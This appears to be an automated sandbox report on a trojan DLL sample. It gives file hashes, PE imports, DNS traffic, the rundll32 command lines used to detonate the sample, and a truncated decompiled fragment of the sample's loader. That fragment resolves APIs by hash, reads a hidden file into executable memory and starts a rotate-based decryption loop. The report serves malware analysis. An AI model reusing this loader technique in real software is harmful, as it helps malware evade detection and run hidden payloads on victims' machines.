SSDEEP:192:BmWdPSWb0Y3VtB+t28e78XdLMDho6bVOs9DARSGzS8k1QndC+:tdPSWb0oVtrSdLMS+ws9ERS2SMdC+
MD5:238E9A735958FDDB081E9EB2CCF3F5F2
SHA1:FDAE50B6B9FEB64AFD9899081B5A38082ABFEECB
SHA-256:7624312B70F1318D512112433F91647EC45B4D27FD185AC480804EBC8CCC90C2
SHA-512:CAC03DCBEB3A86737533B3AD044AE2D34922797D30CEC30C1A890B1891A166FA52983D82843104B44699E1C4F51C689B667D1ACA0818C2E4120B6BF80666EC71
Malicious:false
Preview: MDMP....... ........]Ba...................U...........B......,&......GenuineIntelW...........T............]Ba.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E8A.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 20:55:46 2021, 0x1205a4 type
Category:dropped
Size (bytes):48442
Entropy (8bit):2.1922535271621904
Encrypted:false
SSDEEP:384:frwt+O2+bJmWP5Brow4BESd7awhJWlEOjYWkLyq/sdD:zrO2+bJmqBZurqfqqD
MD5:90D679AD8EC8F2DC48C4B9AE548D5D05
SHA1:D3A26B1FE5106AA6EB8313415A1A44ED05CC50A8
SHA-256:F829585F50DB650F51F0F9D3C983EE3B42E64F4AA10B0E9352DE6656486CF22C
SHA-512:ADBC28A5A993164070BAD897CBC1A6DB0FB3AA7FF36ED01333516117C35B44C3769D72EA171F981A91802C0E62330C18054384EF6B6C9987B785098F6AFA33BD
Malicious:false
Preview: MDMP....... ........]Ba...................U...........B.......%......GenuineIntelW...........T............]Ba.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D70.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8298
Entropy (8bit):3.698193315009564
Encrypted:false
SSDEEP:192:Rrl7r3GLNi0jM6t6YRg6CgmfTNSjCprF89bPOsfUlm:RrlsNiOM6t6YG6CgmfTNSZPNf7
MD5:8DA053235FA5413FECA42C35D606E64B
SHA1:CD19CEF804621477D94645BEC6F5D83D7DA702E8
SHA-256:3271373D6795172209D6973F6F330D164BB9D19C033D63CB635D21FD14235CF6
SHA-512:F5416D3FC0AC6FA3A461CC8B8DB0DAC5AD93FF77ADEE9531663B04FD709BE4F85A20CEB3548AF3122A176549A4BE01EA8FF0D1213739913FE8806C0E1C979A61
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DFC.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8302
Entropy (8bit):3.699736698808125
Encrypted:false
SSDEEP:192:Rrl7r3GLNiQjM6lN6YiDb6HgmfTNSjCprC89bPTsfglm:RrlsNiaM6f6Y0b6HgmfTNSAP4f/
MD5:231EDC1722FBDB0C1E7659E0C2675BAF
SHA1:978E4ACE04A71BA1D0E66AF5E6BF02FD94B5DBAA
SHA-256:0BD95FABB5E2BCB8191E5F5F1828D5FF00C58BD18405B6DC093FA4655B4C994D
SHA-512:1D578D571BFD9ED85D480530F36451CFD881C74F4F3F2E009B33378BFA72770C3E071E2561374C90FE82FE2BCB52595B008791028D1CA85D28842C0910647F05
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.6.4.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7291.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4670
Entropy (8bit):4.493295765137945
Encrypted:false
SSDEEP:48:cvIwSD8zseJgtWI9IkhWSC8By8fm8M4JCdszZFFm+q8/ODT4SrSMd:uITfUP/SNpJRYtTDWMd
MD5:5826A7FBCEC40C6DD665DC173202D42F
SHA1:F8DDB2C39DBDB8CC2C50239AEC819185C29158F9
SHA-256:FCB2A6FB549025B86B9C6C392EAA760F6334E1AC0A2F3B7B92A885450D3B2F34
SHA-512:A79B4306377346F29DE51C36B92CBA65DB2559BF6CC4B8E121340C3B8392D6DFCC2889FE9B557FF7FC17F7C5DE61EE3E82C8EB25A059CA3F16203D465E698252
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER72DF.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4670
Entropy (8bit):4.495450264569302
Encrypted:false
SSDEEP:48:cvIwSD8zseJgtWI9IkhWSC8BF8fm8M4JCdszZF92+q8/OD/4SrSnd:uITfUP/SNMJRkt/DWnd
MD5:8C2520ADE9FBDD6919EBB4A6326665C7
SHA1:AFFF47FE33E005AC6D4FF08BEB2582C3FFC4BF4E
SHA-256:8F2011476C33185D86792514AD906D5B79108E9F91339EB791DE781535E465A3
SHA-512:F3A0AE3C97CC6F3193B0C72FC26D9257A3BCE5829EDEBE46835E1428AE99B73D92BC289A9452455A4F73EB61D4E8D9E50E49238700CBFB435FB765A515089928
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7435.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 20:55:57 2021, 0x1205a4 type
Category:dropped
Size (bytes):55426
Entropy (8bit):2.047974348304252
Encrypted:false
SSDEEP:192:voNYBtxZoeJcnpem8E/M6Xe78XdLMDho6bVOBr2P3SzVXXL0CnMLhJ:vxBtx9qIm8NSdLMS+wBr234XYiwhJ
MD5:66085B5BC581FF486107951EB1436AC1
SHA1:E43C932DC27360CBFB812F2B9A928C15B04D5B64
SHA-256:7E3803D345E8DF343423037732A02F9F8DE1E509293A206261FEBEDA135F8941
SHA-512:7B206677D0177E92BB20CBD42CB36A614605E4773F786BCA705E9378C9A5C00328E097637DDF4C21166B1D93B0B668A39B89D33260326A2315E1F2F7F91AFBFA
Malicious:false
Preview: MDMP....... ........]Ba...................U...........B......,&......GenuineIntelW...........T............]Ba.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B46.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8298
Entropy (8bit):3.698876320594481
Encrypted:false
SSDEEP:192:Rrl7r3GLNiaX6R6YRA6CgmfTNSjCprgx89bpnsf0Dm:RrlsNii6R6Ym6CgmfTNSQpsft
MD5:AB7FFF06910A3FB86E67F93D748BC117
SHA1:6098C57089C877C0B293C11EA795B69D44FB6134
SHA-256:FE5439990D3CAC24E7FD0E03BAE0AAAD13DE32A018E0DCE9FE265BB05E07E3A6
SHA-512:6D35622A28437AEE830C33E37FC1603F84716A3D2E891C76C3B6AE033EBB7FC1C53BD6B4F5485568D6C538D70B8C844A81A16BC44FAFEA771C7DCA5B2598378B
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.3.6.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA162.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4670
Entropy (8bit):4.495755167698384
Encrypted:false
SSDEEP:48:cvIwSD8zseJgtWI9IkhWSC8Bf8fm8M4JCdszZF5D+q8/ODE4SrSzd:uITfUP/SN+JRdtEDWzd
MD5:A15FC667EEFE1F68407FBD377EEB6129
SHA1:BC741C9D463B77E5C12099153DAC5AC492308E1B
SHA-256:FB9061F6DD8380CC999BA63B24A58D08597822DE0157F8E7E39822FE1E9E4169
SHA-512:BA5335CB5C371558B28A24DA4CE1BA01219B903CFD644A81E382A40EF7EA9DA25D960BBA47BA9728E432F3FCFC3D3641601F2A34C67A3242959DF8A9B1EB3634
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):4.102957541893627
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll
File size:4608
MD5:4b59be3cef04547514828f8c6443ae20
SHA1:bed0d3a622ca55a914ceaf885ebc2fb419e8a9eb
SHA256:b7ca395f51df95bd3d5b5b4a30a5c2381a9893f0d66aff011d605319d5c0ea7d
SHA512:5aabf0b4b62e7ec664cc0787eac599fb507b2d79a9967e94244fedecbfd42205de00f29c567679e50247293e0067549e2a6c4b37fa943bf7609df2aa598383eb
SSDEEP:48:iswv7jh9qy/njLFg2jSzhqh+hQaFLi/vMTapIZcCIIISwFIJfzm7W475d2:/wLqyHFgURgb+NUwFIJfzmW47r2
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O0K..^...^...^..E_...^..._...^..GZ...^..G^...^..G\...^.Rich..^.........PE..L...a..`...........!......................... .....

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x10000000
Entrypoint Section:
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, RELOCS_STRIPPED
DLL Characteristics:NO_SEH, NX_COMPAT
Time Stamp:0x60931161 [Wed May 5 21:42:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:8b1a65dc59feff9ba4c412ec478b377b

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x21500x50.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x22540xf0.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x21300x1c.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x100.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x2d60x400False0.498046875data4.58066088703IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x20000x8400xa00False0.41171875data4.11239200133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLLImport
ODBC32.dll
MSWSOCK.dllinet_network, SetServiceA, EnumProtocolsW, GetServiceA
AVIFIL32.dllAVIStreamSetFormat, AVIMakeCompressedStream, AVIStreamReadFormat, AVISaveOptions, AVISave, EditStreamClone, AVIStreamInfoW
MSVFW32.dllICCompressorFree, ICClose
AVICAP32.dllcapGetDriverDescriptionW
rtm.dllMgmReleaseInterfaceOwnership, RtmGetNetworkCount, RtmBlockDeleteRoutes, MgmRegisterMProtocol, RtmCreateEnumerationHandle, RtmDequeueRouteChangeMessage
mscms.dllSetColorProfileElement, GetColorProfileElement, CreateColorTransformW, GetPS2ColorSpaceArray, SelectCMM, GetColorProfileElementTag, SetStandardColorSpaceProfileA, SpoolerCopyFileEvent, OpenColorProfileA
USER32.dllCreateMDIWindowW, LoadImageW, GetActiveWindow
WINMM.dllmmioSetInfo, midiInGetID, timeGetSystemTime, joyConfigChanged, mmioAscend
urlmon.dllGetSoftwareUpdateInfo, URLDownloadToCacheFileA, URLDownloadW, URLOpenStreamW, CreateURLMoniker, CoInternetParseUrl
ole32.dllCoInstall

Exports

NameOrdinalAddress
uvlcopdlxoed10x100010a0

Network Behavior

Network Port Distribution

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Sep 15, 2021 13:55:30.059092999 CEST6434453192.168.2.58.8.8.8
Sep 15, 2021 13:55:30.091650963 CEST53643448.8.8.8192.168.2.5
Sep 15, 2021 13:55:49.564407110 CEST6206053192.168.2.58.8.8.8
Sep 15, 2021 13:55:49.593224049 CEST53620608.8.8.8192.168.2.5
Sep 15, 2021 13:55:54.438810110 CEST6180553192.168.2.58.8.8.8
Sep 15, 2021 13:55:54.471522093 CEST53618058.8.8.8192.168.2.5
Sep 15, 2021 13:56:01.382487059 CEST5479553192.168.2.58.8.8.8
Sep 15, 2021 13:56:01.407468081 CEST53547958.8.8.8192.168.2.5
Sep 15, 2021 13:56:01.855904102 CEST4955753192.168.2.58.8.8.8
Sep 15, 2021 13:56:01.880007982 CEST53495578.8.8.8192.168.2.5
Sep 15, 2021 13:56:04.010724068 CEST6173353192.168.2.58.8.8.8
Sep 15, 2021 13:56:04.051841974 CEST53617338.8.8.8192.168.2.5
Sep 15, 2021 13:56:08.393879890 CEST6544753192.168.2.58.8.8.8
Sep 15, 2021 13:56:08.420722961 CEST53654478.8.8.8192.168.2.5
Sep 15, 2021 13:56:29.967250109 CEST5244153192.168.2.58.8.8.8
Sep 15, 2021 13:56:30.011657953 CEST53524418.8.8.8192.168.2.5
Sep 15, 2021 13:56:41.425196886 CEST6217653192.168.2.58.8.8.8
Sep 15, 2021 13:56:41.461236954 CEST53621768.8.8.8192.168.2.5
Sep 15, 2021 13:57:12.915996075 CEST5959653192.168.2.58.8.8.8
Sep 15, 2021 13:57:12.960661888 CEST53595968.8.8.8192.168.2.5
Sep 15, 2021 13:57:14.534009933 CEST6529653192.168.2.58.8.8.8
Sep 15, 2021 13:57:14.574210882 CEST53652968.8.8.8192.168.2.5

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3668 Parent PID: 4664

General

Start time:13:55:35
Start date:15/09/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll'
Imagebase:0xf00000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: cmd.exe PID: 5444 Parent PID: 3668

General

Start time:13:55:36
Start date:15/09/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Imagebase:0x150000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 1752 Parent PID: 3668

General

Start time:13:55:36
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Imagebase:0xd0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 2564 Parent PID: 5444

General

Start time:13:55:36
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Imagebase:0xd0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: WerFault.exe PID: 5440 Parent PID: 2564

General

Start time:13:55:39
Start date:15/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812
Imagebase:0x1270000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: WerFault.exe PID: 716 Parent PID: 1752

General

Start time:13:55:40
Start date:15/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 804
Imagebase:0x1270000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 2036 Parent PID: 3668

General

Start time:13:55:40
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed
Imagebase:0xd0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: WerFault.exe PID: 2600 Parent PID: 2036

General

Start time:13:55:44
Start date:15/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 804
Imagebase:0x1270000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: rundll32.exe PID: 1752 Parent PID: 3668 rundll32.exeCOMMON

    Executed Functions

    Function 100010A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97filememoryCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E100010A0(void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v536;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t33;
				void* _t34;
				void* _t37;
				signed char _t49;
				void* _t53;

				_v8 = 0;
				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_v12 = E10001000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
				_t24 = E10001000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xcbec1a0);
				_t25 = E10001000(_t47, 0xa4f84a9a);
				_v16 = E10001000(_t47, 0x433a3842);
				E10001000(_t47, 0xa5f15738);
				 *_t24(0x103,  &_v536);
				 *_t25( &_v536, L"\\t8vkb8377ta67uaw82uc");
				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
				_t34 = VirtualAlloc(0, 0x1a05, 0x3000, 0x40); // executed
				_t53 = _t34;
				ReadFile(_t33, _t53, 0x1a05,  &_v8, 0);
				_t49 = 0;
				if(_v8 > 0) {
					do {
						asm("rol al, 1");
						asm("ror al, 0x3");
						asm("ror al, 0x3");
						asm("ror al, 1");
						asm("rol al, 0x3");
						asm("rol dl, 0x2");
